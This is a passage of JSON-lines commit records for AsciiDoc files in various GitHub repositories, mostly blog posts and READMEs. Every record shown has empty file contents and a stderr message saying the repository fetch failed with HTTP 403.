2017-06-20-Using-MATLAB-to-control-hardware-1-Message-Passing-Systems.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2017-06-20-Using-MATLAB-to-control-hardware-1-Message-Passing-Systems.adoc","new_file":"_posts\/2017-06-20-Using-MATLAB-to-control-hardware-1-Message-Passing-Systems.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03f409460569b0846e34ea1bcc08b93aa2584f73","subject":"Update 2016-03-28-Happy-Easter.adoc","message":"Update 2016-03-28-Happy-Easter.adoc","repos":"mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io","old_file":"_posts\/2016-03-28-Happy-Easter.adoc","new_file":"_posts\/2016-03-28-Happy-Easter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcrotty\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce670a704e2a1dbc8564529ad0782e82ca185696","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85d69f9b9686887a0fe44f974f52fea51aa83e22","subject":"Update 2015-10-26-Service-Worker.adoc","message":"Update 2015-10-26-Service-Worker.adoc","repos":"wheeliz\/tech-blog,wheeliz\/tech-blog,wheeliz\/tech-blog","old_file":"_posts\/2015-10-26-Service-Worker.adoc","new_file":"_posts\/2015-10-26-Service-Worker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wheeliz\/tech-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fca198307903aecf2e2024038973ec96f154236","subject":"Update 2015-12-06-Clojure-X-2015.adoc","message":"Update 2015-12-06-Clojure-X-2015.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2015-12-06-Clojure-X-2015.adoc","new_file":"_posts\/2015-12-06-Clojure-X-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"471f8c91e98d0b798fcf82d6bcfe4925ddef427e","subject":"Update 2016-08-30-About-me.adoc","message":"Update 2016-08-30-About-me.adoc","repos":"rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io","old_file":"_posts\/2016-08-30-About-me.adoc","new_file":"_posts\/2016-08-30-About-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rage5474\/rage5474.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0debd9c1c7e31667ab9ca894b39a0f4f981f501","subject":"#12 AsciiDoctor general template","message":"#12 AsciiDoctor general template\n","repos":"SopraSteriaGroup\/initiatives_backend_ideas","old_file":"src\/docs\/asciidoc\/index.adoc","new_file":"src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SopraSteriaGroup\/initiatives_backend_ideas.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fe34bb7273017ff1ca822ffba831582ad163053","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72907246a08c1b77dba5607b730a4f77a38e6783","subject":"troubleshooting images","message":"troubleshooting images\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_stateless.asciidoc","new_file":"trex_stateless.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f519ed5b656db50497bb9d26664a85bfe0d15bdd","subject":"Renamed '_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system.adoc' to '_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc'","message":"Renamed '_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system.adoc' to '_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc'","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","new_file":"_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2860b15710c9e55816d1309eab938390ce2bf5d4","subject":"Create FRP.adoc","message":"Create FRP.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"FRP.adoc","new_file":"FRP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"1ef3cbd8f28b383bf7dd6eac856ab00d7f774c90","subject":"Git test svg inline","message":"Git test svg inline\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git.adoc","new_file":"Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99084f4b1c7c6fb2c6ff58678a8823baee29a4e1","subject":"[CAMEL-10786] Adding a missing doc resource","message":"[CAMEL-10786] Adding a missing doc resource\n","repos":"dmvolod\/camel,pmoerenhout\/camel,pkletsko\/camel,rmarting\/camel,drsquidop\/camel,apache\/camel,yuruki\/camel,sverkera\/camel,onders86\/camel,prashant2402\/camel,lburgazzoli\/camel,adessaigne\/camel,driseley\/camel,gnodet\/camel,jonmcewen\/camel,jkorab\/camel,tdiesler\/camel,nicolaferraro\/camel,mgyongyosi\/camel,adessaigne\/camel,jamesnetherton\/camel,apache\/camel,sverkera\/camel,apache\/camel,gnodet\/camel,anoordover\/camel,akhettar\/camel,scranton\/camel,tdiesler\/camel,nboukhed\/camel,pmoerenhout\/camel,apache\/camel,anoordover\/camel,akhettar\/camel,curso007\/camel,mcollovati\/camel,alvinkwekel\/camel,tadayosi\/camel,allancth\/camel,gautric\/camel,driseley\/camel,mgyongyosi\/camel,NickCis\/camel,Thopap\/camel,DariusX\/camel,adessaigne\/camel,onders86\/camel,snurmine\/camel,jkorab\/camel,pkletsko\/camel,snurmine\/camel,pax95\/camel,davidkarlsen\/camel,anoordover\/camel,pkletsko\/camel,acartapanis\/camel,nikhilvibhav\/camel,CodeSmell\/camel,DariusX\/camel,lburgazzoli\/camel,jamesnetherton\/camel,anoordover\/camel,gnodet\/camel,tlehoux\/camel,CodeSmell\/camel,kevinearls\/camel,tadayosi\/camel,isavin\/camel,driseley\/camel,rmarting\/camel,apache\/camel,akhettar\/camel,prashant2402\/camel,nboukhed\/camel,apache\/camel,jamesnetherton\/camel,anoordover\/camel,nboukhed\/camel,onders86\/camel,christophd\/camel,snurmine\/camel,yuruki\/camel,objectiser\/camel,NickCis\/camel,gnodet\/camel,dmvolod\/camel,drsquidop\/camel,driseley\/camel,isavin\/camel,gnodet\/camel,lburgazzoli\/camel,isavin\/camel,Fabryprog\/camel,jonmcewen\/camel,nicolaferraro\/camel,rmarting\/camel,nikhilvibhav\/camel,christophd\/camel,anoordover\/camel,mcollovati\/camel,mgyongyosi\/camel,drsquidop\/camel,tadayosi\/camel,lburgazzoli\/apache-camel,mgyongyosi\/camel,rmarting\/camel,jonmcewen\/camel,curso007\/camel,NickCis\/camel,kevinearls\/camel,Thopap\/camel,scranton\/camel,pmoerenhout\/camel,gautric\/camel,driseley\/camel,davidkarlsen\/camel,yuruki\/camel,akhettar\/camel,tdiesler\/camel,kevinearls\/camel,lburgazzoli\/apache-camel,punkhorn\/camel-upstream,lburgazzoli\/camel,ullgren\/camel,adessaigne\/camel,objectiser\/camel,NickCis\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,cunningt\/camel,anton-k11\/camel,Fabryprog\/camel,jamesnetherton\/camel,pmoerenhout\/camel,tadayosi\/camel,prashant2402\/camel,drsquidop\/camel,onders86\/camel,cunningt\/camel,acartapanis\/camel,Thopap\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,rmarting\/camel,salikjan\/camel,mcollovati\/camel,jonmcewen\/camel,punkhorn\/camel-upstream,tadayosi\/camel,yuruki\/camel,anton-k11\/camel,Thopap\/camel,kevinearls\/camel,zregvart\/camel,scranton\/camel,Fabryprog\/camel,zregvart\/camel,gautric\/camel,davidkarlsen\/camel,ullgren\/camel,zregvart\/camel,snurmine\/camel,jkorab\/camel,zregvart\/camel,christophd\/camel,ullgren\/camel,sverkera\/camel,yuruki\/camel,onders86\/camel,allancth\/camel,christophd\/camel,tdiesler\/camel,kevinearls\/camel,jkorab\/camel,salikjan\/camel,nboukhed\/camel,sverkera\/camel,NickCis\/camel,nicolaferraro\/camel,sverkera\/camel,lburgazzoli\/apache-camel,adessaigne\/camel,anton-k11\/camel,cunningt\/camel,scranton\/camel,tdiesler\/camel,punkhorn\/camel-upstream,tdiesler\/camel,alvinkwekel\/camel,tlehoux\/camel,allancth\/camel,dmvolod\/camel,anton-k11\/camel,prashant2402\/camel,jonmcewen\/camel,pmoerenhout\/camel,tlehoux\/camel,isavin\/camel,sverkera\/camel,alvinkwekel\/camel,anton-k11\/camel,acartapanis\/camel,tlehoux\/camel,scranton\/camel,kevinearls\/camel,pax95\/camel,objectiser\/camel,dmvolod\/camel,isavin\/camel,pkletsko\/camel,tlehoux\/camel,CodeSmell\/camel,akhettar\/camel,pkletsko\/camel,drsquidop\/camel,dmvolod\/camel,cunningt\/camel,NickCis\/camel,alvinkwekel\/camel,nboukhed\/camel,allancth\/camel,acartapanis\/camel,lburgazzoli\/apache-camel,prashant2402\/camel,pkletsko\/camel,tadayosi\/camel,akhettar\/camel,curso007\/camel,Thopap\/camel,christophd\/camel,curso007\/camel,DariusX\/camel,lburgazzoli\/camel,DariusX\/camel,gautric\/camel,snurmine\/camel,curso007\/camel,dmvolod\/camel,cunningt\/camel,Thopap\/camel,drsquidop\/camel,allancth\/camel,pax95\/camel,CodeSmell\/camel,mgyongyosi\/camel,curso007\/camel,objectiser\/camel,acartapanis\/camel,acartapanis\/camel,gautric\/camel,pax95\/camel,nicolaferraro\/camel,Fabryprog\/camel,ullgren\/camel,pax95\/camel,anton-k11\/camel,prashant2402\/camel,gautric\/camel,driseley\/camel,mgyongyosi\/camel,nboukhed\/camel,scranton\/camel,pmoerenhout\/camel,isavin\/camel,adessaigne\/camel,lburgazzoli\/apache-camel,yuruki\/camel,jamesnetherton\/camel,cunningt\/camel,davidkarlsen\/camel,tlehoux\/camel,onders86\/camel,jonmcewen\/camel,jkorab\/camel,pax95\/camel,lburgazzoli\/camel,mcollovati\/camel,rmarting\/camel,snurmine\/camel,jkorab\/camel,allancth\/camel,christophd\/camel,lburgazzoli\/apache-camel","old_file":"components\/camel-azure\/src\/main\/docs\/azure-queue-component.adoc","new_file":"components\/camel-azure\/src\/main\/docs\/azure-queue-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d189641b2fb5a44fcf4b0ab1b2470d0614eae266","subject":"y2b create post South Park: The Stick of Truth Grand Wizard Edition Unboxing","message":"y2b create post South Park: The Stick of Truth Grand Wizard Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-03-05-South-Park-The-Stick-of-Truth-Grand-Wizard-Edition-Unboxing.adoc","new_file":"_posts\/2014-03-05-South-Park-The-Stick-of-Truth-Grand-Wizard-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29e1d37f872761b87ce156d73deda350d453e1d5","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"asciidoctor\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ysb33r\/asciidoctor-gradle-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d5cbd1203db5c7f1735714514655ec2860995894","subject":"Update 2017-01-05-Exploring-alternative-neural-computational-models-continued.adoc","message":"Update 2017-01-05-Exploring-alternative-neural-computational-models-continued.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2017-01-05-Exploring-alternative-neural-computational-models-continued.adoc","new_file":"_posts\/2017-01-05-Exploring-alternative-neural-computational-models-continued.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91bc213b6426a1dbbd1e7b216df65ce83c62c6a6","subject":"Update 2015-08-27-Why-am-I-here.adoc","message":"Update 2015-08-27-Why-am-I-here.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-27-Why-am-I-here.adoc","new_file":"_posts\/2015-08-27-Why-am-I-here.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/extrapolate\/extrapolate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"738c8bfc7936776872832cbddab6fc12d4a709b7","subject":"Update 2017-03-14-MMM-delicious.adoc","message":"Update 2017-03-14-MMM-delicious.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-03-14-MMM-delicious.adoc","new_file":"_posts\/2017-03-14-MMM-delicious.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07517b6afc88046231df83fae86e62b1b32eb4f7","subject":"Update 2018-01-20-Bitrise-de-ci.adoc","message":"Update 2018-01-20-Bitrise-de-ci.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-20-Bitrise-de-ci.adoc","new_file":"_posts\/2018-01-20-Bitrise-de-ci.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"052935b3840223ec7aa6129a035b71758f6d5e2d","subject":"Update 2015-08-29-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","message":"Update 2015-08-29-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-29-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","new_file":"_posts\/2015-08-29-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/extrapolate\/extrapolate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4af0e8487f4fbd711c66f59ca6dc513c9b42c55e","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3da60a56e4ea841f63e61b93d600b1e58bb3c454","subject":"Update 2018-01-01-Test-Post.adoc","message":"Update 2018-01-01-Test-Post.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2018-01-01-Test-Post.adoc","new_file":"_posts\/2018-01-01-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d16dcf80b065d81dd4d43aafc667d52442fb657","subject":"Update 2015-03-01-Hello-world.adoc","message":"Update 2015-03-01-Hello-world.adoc","repos":"frenchduff\/frenchduff.github.io,frenchduff\/frenchduff.github.io,frenchduff\/frenchduff.github.io","old_file":"_posts\/2015-03-01-Hello-world.adoc","new_file":"_posts\/2015-03-01-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frenchduff\/frenchduff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dad6ac778a8f4eeccc6d7884dce8706303ba6253","subject":"Update 2016-08-29-Hello-world.adoc","message":"Update 2016-08-29-Hello-world.adoc","repos":"fbruch\/fbruch.github.com,fbruch\/fbruch.github.com,fbruch\/fbruch.github.com,fbruch\/fbruch.github.com","old_file":"_posts\/2016-08-29-Hello-world.adoc","new_file":"_posts\/2016-08-29-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbruch\/fbruch.github.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b74c8e49097b4a76915e32c01f6bb54f9d73afb","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ff07c123dfed8da287b57f1453366c9e1204685","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c1153f967bd1352e49c5a689e220575a871593a","subject":"Readme for ext projects","message":"Readme for ext projects","repos":"BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j","old_file":"ext\/README.adoc","new_file":"ext\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BrunoEberhard\/minimal-j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"368c2643cb6f043e87e7bd91aa82568e9f3995d7","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0e8d0f8fe94521a9d6fa6efdbc88d5dd221e47a","subject":"y2b create post PS4 vs Xbox One Showdown [#1] (The Controllers)","message":"y2b create post PS4 vs Xbox One Showdown [#1] (The Controllers)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-12-28-PS4-vs-Xbox-One-Showdown-1-The-Controllers.adoc","new_file":"_posts\/2013-12-28-PS4-vs-Xbox-One-Showdown-1-The-Controllers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"baed3925d97da0e5e11599299dafa6be8700cd4c","subject":"Update readme","message":"Update readme\n","repos":"systemd-commander\/systemd-commander","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/systemd-commander\/systemd-commander.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"73f149fbddd2ede488770678dbc9daae66c92fd3","subject":"link doc as readme","message":"link doc as readme\n","repos":"getreu\/asciiart-hangman-for-kids.rs,getreu\/asciiart-hangman-for-kids.rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciiart-hangman-for-kids.rs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85c0a8d6075ee03470e9950e0d7e0b44c420f43d","subject":"Update doc to reflect C* 2.2 dependency","message":"Update doc to reflect C* 2.2 dependency\n","repos":"mwringe\/hawkular-metrics,burmanm\/hawkular-metrics,burmanm\/hawkular-metrics,jotak\/hawkular-metrics,jotak\/hawkular-metrics,mwringe\/hawkular-metrics,pilhuhn\/rhq-metrics,pilhuhn\/rhq-metrics,pilhuhn\/rhq-metrics,ppalaga\/hawkular-metrics,ppalaga\/hawkular-metrics,spadgett\/hawkular-metrics,mwringe\/hawkular-metrics,hawkular\/hawkular-metrics,pilhuhn\/rhq-metrics,spadgett\/hawkular-metrics,jotak\/hawkular-metrics,jotak\/hawkular-metrics,mwringe\/hawkular-metrics,tsegismont\/hawkular-metrics,ppalaga\/hawkular-metrics,hawkular\/hawkular-metrics,tsegismont\/hawkular-metrics,spadgett\/hawkular-metrics,burmanm\/hawkular-metrics,ppalaga\/hawkular-metrics,tsegismont\/hawkular-metrics,spadgett\/hawkular-metrics,spadgett\/hawkular-metrics,burmanm\/hawkular-metrics,hawkular\/hawkular-metrics,tsegismont\/hawkular-metrics,hawkular\/hawkular-metrics","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57115c1ae785f3791589cfd844e1c3fd9efaf911","subject":"Add origin and work with clone information","message":"Add origin and work with clone information\n\nSigned-off-by: Stephan Linz <0c883f969082385953c36ae90fd905b7f154694b@li-pro.net>\n","repos":"lipro-yocto\/git-repo,lipro-yocto\/git-repo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lipro-yocto\/git-repo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da1e5f93a3bcf730fe15a3c9a63a407163aba81a","subject":"Add README.adoc","message":"Add README.adoc\n","repos":"tatsuya6502\/bhyve-scripts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tatsuya6502\/bhyve-scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"328b0b081d404c8bb72e23e9833ae12eb07e1fa1","subject":"Problem: users don't know what OS dependencies are needed","message":"Problem: users don't know what OS dependencies are needed\n\nSolution: add \"openssl gcc pkgconfig libudev\" to the readme\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f0394c32c11f58cf62642ba4857abd1fd77975e","subject":"Update 2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","message":"Update 2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","new_file":"_posts\/2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb1d1b1decaf9e5581dae807cbf08927b87ef005","subject":"Update 2017-07-04-Open-source-is-the-most-important-motor-for-innovation.adoc","message":"Update 2017-07-04-Open-source-is-the-most-important-motor-for-innovation.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-07-04-Open-source-is-the-most-important-motor-for-innovation.adoc","new_file":"_posts\/2017-07-04-Open-source-is-the-most-important-motor-for-innovation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 